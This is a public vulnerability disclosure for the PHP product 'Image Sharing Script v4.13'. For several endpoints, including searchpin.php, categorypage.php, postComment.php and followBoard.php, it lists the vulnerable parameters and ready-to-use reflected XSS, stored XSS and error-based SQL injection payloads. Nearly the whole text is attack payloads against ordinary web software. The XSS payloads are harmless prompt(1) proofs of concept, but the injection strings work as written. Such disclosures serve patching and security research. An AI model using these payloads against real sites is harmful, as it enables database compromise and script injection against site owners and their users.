Image Sharing Script 4.13 Cross Site Scripting / SQL Injection

`Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability  
Author : Hasan Emre Ozer  
Google Dork : -  
Date : 16/01/2017  
Type : webapps  
Platform: PHP  
Vendor Homepage : http://itechscripts.com/image-sharing-script/  
Sofware Price and Demo : $1250  
http://photo-sharing.itechscripts.com/  
  
--------------------------------  
Type: Reflected XSS  
Vulnerable URL: http://localhost/[PATH]/searchpin.php  
Vulnerable Parameters : q=  
Payload:"><img src=i onerror=prompt(1)>  
-------------------------------  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php  
Vulnerable Parameters: pid  
Method: GET  
Payload: ' AND (SELECT 2674 FROM(SELECT  
COUNT(*),CONCAT(0x717a717671,(SELECT  
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH  
-------------------------------  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]/categorypage.php  
Vulnerable Parameters: token  
Method: GET  
Payload: ' AND (SELECT 2674 FROM(SELECT  
COUNT(*),CONCAT(0x717a717671,(SELECT  
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH  
  
--------------------------------  
Type: Reflected XSS  
Vulnerable URL: http://localhost/[PATH]/categorypage.php  
Vulnerable Parameters : token  
Payload:"><img src=i onerror=prompt(1)>  
  
-------------------------------  
Type: Stored XSS  
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php  
Method: POST  
Vulnerable Parameters : &text=  
Payload:<img src=i onerror=prompt(1)>  
--------------------------------  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php  
Vulnerable Parameters: id  
Method: POST  
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT  
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH  
---------------------------------  
Type: Error Based Sql Injection  
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php  
Vulnerable Parameters: brdId  
Method: POST  
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT  
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH  
  
  
--   
Best Regards,  
Hasan Emre  
`